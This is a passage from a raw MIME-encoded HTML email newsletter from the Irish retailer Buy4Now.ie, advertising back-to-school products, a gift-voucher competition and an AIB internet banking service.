 g&amp;g=3D5&gt; .=20
 Buy4Now.ie is registered and operates under EU data protection
 legislation. For more information and to view our privacy policy, click
 here &lt;http://www.buy4now.ie/register/datainfo.htm&gt; . If you have any
 comments please drop us an email, simply click here
 &lt;mailto:newslettercomments@buy4now.ie&gt; .=20
  =09
 =20
  =09
  =09
 =20
 ------=_NextPart_000_22A2C_01C23F09.09760420
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;&lt;!--- if you're reading this note and the rest of this email looks =
 like
  gibberish,=20
 it's because we're sending you an HTML email which your computer can't
  read&amp;#46; =20
 Apologies for this inconvenience - you can change the format we send
  your newsletter=20
 in quickly and easily - just email us at: =
 newslettercomments@buy4now&amp;#46;ie,=20
 Subject: Send me this newsletter in TEXT format&amp;#46;
 Thanks - the Buy4Now newsletter team---&gt;
 &lt;head&gt;
 &lt;title&gt;Buy4Now August Newsletter&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#330066" =
 vlink=3D"#330066" alink=3D"#330066" leftmargin=3D"0" topmargin=3D"0" =
 marginwidth=3D"0" marginheight=3D"0"&gt;
 &lt;div align=3D"center"&gt;
   &lt;table width=3D"560" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
     &lt;tr&gt;
       &lt;td&gt;=20
         &lt;div align=3D"left"&gt;&lt;a href=3D"http://www&amp;#46;buy4now&amp;#46;ie" =
 target=3D"_blank"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHeader1&amp;#4=
 6;gif" height=3D"72" width=3D"145" border=3D"0"&gt;&lt;/a&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHeader2&amp;#4=
 6;gif" width=3D"415" height=3D"72"&gt;&lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table width=3D"560" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
   =20
     &lt;tr&gt;=20
       &lt;td bgcolor=3D"#660099"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
       &lt;td&gt;=20
         &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td height=3D"40"&gt;=20
                     &lt;table border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                       &lt;tr valign=3D"middle" align=3D"center"&gt;=20
                         &lt;td valign=3D"top"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/search_heading=
 &amp;#46;gif" width=3D"48" height=3D"19"&gt;&lt;/td&gt;
                         &lt;td valign=3D"top"&gt;=20
                          &lt;form name=3D"frmsearch" method=3D"post" =
 action=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp"&gt;
 &lt;input type=3D"hidden" name=3D"search_storename" value =3D "ALL"&gt;
                             &lt;input type=3D"text" =
 name=3D'search_searchvalue'  value=3D"" size=3D"10" maxlength=3D"30"&gt;
 &lt;input type=3D"image" name=3D"go" =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/search_gobutto=
 n&amp;#46;gif" width=3D"26" height=3D"19"&gt;
 &lt;input type=3D'hidden' name=3D'search_type' value=3D'1'&gt;
 &lt;/form&gt;
                         &lt;/td&gt;
                         &lt;td valign=3D"top"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;&lt;/td&gt;
                   &lt;td align=3D"right" valign=3D"top" height=3D"40"&gt;=20
                     &lt;div align=3D"right"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/header_members=
 &amp;#46;gif" width=3D"319" height=3D"19" usemap=3D"#Map" =
 border=3D"0"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"16"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;div align=3D"right"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/categories_b2s=
 &amp;#46;gif" width=3D"513" height=3D"27" usemap=3D"#Map4" =
 border=3D"0"&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                   &lt;td valign=3D"top"&gt;&lt;font color=3D"#330066" size=3D"2" =
 face=3D"Arial, Helvetica, sans-serif"&gt;It's=20
                     Back to School at Buy4Now, but don't feel down =
 because we=20
                     have lots of special offers, a great competition and =
 more=20
                     to cheer you up!&lt;/font&gt;&lt;/td&gt;
                   &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"22"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td height=3D"11"&gt;
               &lt;table width=3D"559" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td rowspan=3D"2"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                   &lt;td valign=3D"top"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHeaderComp=
 etition&amp;#46;gif" height=3D"25" width=3D"250"&gt;&lt;/td&gt;
                   &lt;td rowspan=3D"2"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td valign=3D"top"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;b&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backAppleIcon&amp;=
 #46;gif" width=3D"47" height=3D"45" align=3D"left"&gt;=20
                     WIN a &amp;euro;2,000 Online Gift Voucher with =
 Buy4Now!&lt;br&gt;
                     &lt;/b&gt;From August 8th to 29th, find as many apples as =
 you can=20
                     on the Buy4Now partner sites, and enter our =
 draw&amp;#46; Everytime=20
                     you find an apple, click on it to enter your login =
 email address=20
                     and password&amp;#46; You can enter as many times as you =
 want: the=20
                     more apples you find, the more chances you =
 get&amp;#46;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td height=3D"22"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHeader_goo=
 dies&amp;#46;gif" width=3D"250" height=3D"25"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr align=3D"center" valign=3D"middle"&gt;=20
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/b2s_eason&amp;#46;=
 jpg" width=3D"95" height=3D"81"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/beechdesk&amp;#46;=
 jpg" width=3D"80" height=3D"90"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/voicerecordere=
 mail&amp;#46;jpg" width=3D"53" height=3D"90"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/dmgcds&amp;#46;gif=
 " width=3D"95" height=3D"73"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr valign=3D"top"&gt;=20
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/Eason/main_frame&amp;#46;asp?target=3D3=
 &amp;sectionid=3D1&amp;subsectionid=3D7" target=3D"_blank"&gt;Eason=20
                       school books &amp;amp; academic titles&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;Spend over &amp;euro;70 and =
 get free delivery!&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/atlanticdiy/viewcategory&amp;#46;asp?Ca=
 tID=3D46603&amp;StoreID=3D1&amp;Level=3D2&amp;type=3D1" target=3D"_blank"&gt;Multimedia =
                       desk&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;Ideal for the study or =
 home office&amp;#46;=20
                       &amp;euro;99&lt;/font&gt; &lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/giftstore/index&amp;#46;asp?p=3D844&amp;por=
 tal=3D1&amp;qty=3D1&amp;target=3D3"&gt;Handheld=20
                       voice &amp;amp; email unit&lt;/a&gt;&amp;#46; &lt;font =
 color=3D"#660099"&gt;Record=20
                       a message, store it, then email it! =
 &amp;euro;350&lt;/font&gt; &lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/dmgdirect/main&amp;#46;asp?sectionid=3D=
 3&amp;subsectionid=3D0&amp;target=3D3" target=3D"_blank"&gt;Music=20
                       to study by&amp;#46;&amp;#46;&amp;#46;&amp;#46;&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;Great savings with =
 DMGDirect's summer=20
                       sale&amp;#46; &lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr align=3D"center" valign=3D"middle"&gt;=20
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/brasil-bag-l&amp;#=
 46;jpg" width=3D"70" height=3D"90"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spaceypen&amp;#46;=
 jpg" width=3D"68" height=3D"95"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/shirts_b2s&amp;#46=
 ;jpg" width=3D"65" height=3D"80"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/celotape&amp;#46;j=
 pg" width=3D"90" height=3D"77"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr valign=3D"top"&gt;=20
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/satelite/catfind&amp;#46;asp?portal=3D1=
 &amp;categoryid=3D201&amp;StoreID=3D1&amp;Level=3D1&amp;type=3D1" target=3D"_blank"&gt;Nike =
                       Brazil backpack&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;Be sure to be seen with =
 this bright=20
                       bag&amp;#46;&amp;#46;&amp;#46;&amp;euro;26&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/source/shopping/viewwhitebasket&amp;#46=
 ;asp?StoreID=3D1&amp;ProdID=3D3373&amp;type=3D1"&gt;Spacey=20
                       pen&amp;#46;&lt;br&gt;
                       &lt;/a&gt;&lt;font color=3D"#660099"&gt;Funny and funky, =
 whether you're=20
                       7 or 45 yrs old&amp;#46; &amp;euro;7&amp;#46;95&lt;/font&gt; =
 &lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/arnotts/viewcategory&amp;#46;asp?CatID=3D=
 1141&amp;StoreID=3D1&amp;Level=3D1&amp;type=3D1" target=3D"_blank"&gt;Pack=20
                       of 2 school shirts&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;No more hassle: order your =
 schoolwear=20
                       from &lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/arnotts" =
 target=3D"_blank"&gt;Arnotts&amp;#46;ie&lt;/a&gt;&amp;#46;=20
                       &lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/source/shopping/viewwhitebasket&amp;#46=
 ;asp?StoreID=3D1&amp;ProdID=3D3371&amp;type=3D1"&gt;Tape=20
                       dispenser&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt; Add a touch of kitsch to =
 your desk=20
                       with our flowery dispenser&amp;#46; =
 &amp;euro;9&amp;#46;99&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"22" valign=3D"middle"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"5" valign=3D"middle"&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td rowspan=3D"3" width=3D"10"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                   &lt;td width=3D"319" valign=3D"top"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHeaderMemb=
 ers&amp;#46;gif" height=3D"25"&gt;&lt;/td&gt;
                   &lt;td valign=3D"top" rowspan=3D"3" width=3D"19"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"20" height=3D"10"&gt;&lt;/td&gt;
                   &lt;td width=3D"200" valign=3D"top" rowspan=3D"3"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHowDoI&amp;#46=
 ;gif" width=3D"200" height=3D"134" usemap=3D"#Map2" border=3D"0"&gt;&lt;/td&gt;
                   &lt;td rowspan=3D"3" width=3D"10"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"319" valign=3D"top" height=3D"4"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"4"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"319" valign=3D"top" align=3D"left"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D2&amp;ss=3D0&amp;sc=3DM" =
 target=3D"_blank"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/trash_img5&amp;#46=
 ;jpg" width=3D"68" height=3D"90" align=3D"left" border=3D"0"&gt;&lt;/a&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;b&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D2&amp;ss=3D0&amp;sc=3DM" =
 target=3D"_blank"&gt;Lord=20
                     of the Rings DVD set&lt;/a&gt;, from DMGDirect&amp;#46;&lt;br&gt;
                     &lt;/b&gt; This 2 discs set contains &lt;i&gt;The Fellowship of =
 the Ring&lt;/i&gt;,=20
                     plus lots of extra features&amp;#46; RRP =
 &amp;euro;43&amp;#46;25, Online Price:=20
                     &amp;euro;37&amp;#46;99&amp;#46;&lt;font color=3D"#FF6600"&gt; =
 &lt;b&gt;Buy4Now Members: &amp;euro;33&amp;#46;99&amp;#46;=20
                     Save &amp;euro;4!&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"22" valign=3D"middle"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"90%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0" align=3D"center"&gt;
                 &lt;tr align=3D"left" valign=3D"top" bgcolor=3D"#FFFFFF"&gt;=20
                   &lt;td width=3D"18%" height=3D"58" align=3D"center" =
 valign=3D"top"&gt;&lt;a href=3D"http://www&amp;#46;aib&amp;#46;ie/personal" =
 target=3D"_blank"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/Boys_aib&amp;#46;j=
 pg" width=3D"75" height=3D"75" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td width=3D"82%" height=3D"58"&gt;=20
                     &lt;div align=3D"left"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;It&amp;#146;s=20
                       all about choice, convenience and control! =
 Register today=20
                       for &lt;b&gt;AIB&amp;#146;s Internet and Phone Banking =
 service&lt;/b&gt;=20
                       and be the master of your finances&amp;#46; With =
 AIB&amp;#146;s Internet=20
                       and Phone Banking service you can pay a wide range =
 of domestic=20
                       bills including ESB and ntl, check the balance of =
 your accounts,=20
                       transfer funds, view statements of your accounts, =
 search=20
                       for a cheque and much, much more&amp;#46;&lt;/font&gt;&lt;/div&gt;
                     &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                   &lt;td colspan=3D"2"&gt;=20
                     &lt;p align=3D"left"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;&lt;b&gt;For=20
                       more information&lt;/b&gt; on the range of services that =
 you can=20
                       do &lt;a =
 href=3D"http://www&amp;#46;aibgroup&amp;#46;com/servlet/ContentServer?pagename=3D=
 AIB_PersonalPortal/AIB_Services/aib_d_service&amp;c=3DAIB_Services&amp;cid=3D1005=
 066604069&amp;channel=3DHP" target=3D"_blank"&gt;click=20
                       here&amp;#46;&lt;br&gt;
                       &lt;/a&gt;&lt;b&gt;To register&lt;/b&gt; today &lt;a =
 href=3D"http://194&amp;#46;69&amp;#46;198&amp;#46;130/servlet/ContentServer?pagename=3D=
 AIB_PersonalPortal/Miscellaneous/24_hour_banking_app_1&amp;c=3DAIB_Applicatio=
 n&amp;cid=3D1018955566725&amp;channel=3DHP" target=3D"_blank"&gt;click=20
                       here&lt;/a&gt;&amp;#46; &lt;br&gt;
                       &lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;&lt;i&gt;&lt;br&gt;
                       Terms and conditions apply&amp;#46; Allied Irish =
 Banks, p&amp;#46;l&amp;#46;c&amp;#46; is=20
                       licensed by the Central Bank of =
 Ireland&amp;#46;&lt;/i&gt;&lt;/font&gt; &lt;/p&gt;
                     &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
              =20
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"22"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/b2s_cheer&amp;#46;=
 gif" width=3D"250" height=3D"25"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr align=3D"center" valign=3D"middle"&gt;=20
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/gamecube&amp;#46;j=
 pg" width=3D"60" height=3D"90"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/pbabyfridge&amp;#4=
 6;jpg" width=3D"64" height=3D"90"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/monsters_b2s&amp;#=
 46;jpg" width=3D"57" height=3D"85"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/mp3player&amp;#46;=
 jpg" width=3D"82" height=3D"90"&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr valign=3D"top"&gt;=20
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/giftstore/index&amp;#46;asp?p=3D736&amp;por=
 tal=3D1&amp;qty=3D1&amp;target=3D3"&gt;Nintendo=20
                       Game Cube&amp;#46;&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;G&lt;/font&gt;&lt;font =
 color=3D"#660099"&gt;aming=20
                       at its very best&amp;#46; =
 &amp;euro;219&amp;#46;99&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/source/shopping/viewwhitebasket&amp;#46=
 ;asp?StoreID=3D1&amp;ProdID=3D3369&amp;type=3D1"&gt;EFX=20
                       Baby minicooler&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;Keep your cans cool at =
 home or in=20
                       the office&amp;#46; &amp;euro;159&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/dmgdirect/main&amp;#46;asp?target=3D41&amp;=
 prodid=3D80594"&gt;Monsters=20
                       Inc&amp;#46; DVD&lt;/a&gt;&lt;br&gt;
                       &lt;font color=3D"#660099"&gt;Boo! &lt;/font&gt;&lt;font =
 color=3D"#660099"&gt;Pre-order=20
                       your copy now (released on =
 07/09)&amp;#46;&amp;euro;29&amp;#46;04&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"25%"&gt;=20
                     &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#330066"&gt;&lt;a =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/arnotts/viewcategory&amp;#46;asp?CatID=3D=
 1093&amp;StoreID=3D1&amp;Level=3D1&amp;type=3D1"&gt;Philips=20
                       MP3 player&amp;#46;&lt;br&gt;
                       &lt;/a&gt;&lt;font color=3D"#660099"&gt;Also plays CDs, for =
 music on the=20
                       go&amp;#46; &amp;euro;249&amp;#46;99&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td height=3D"22"&gt;&lt;img =
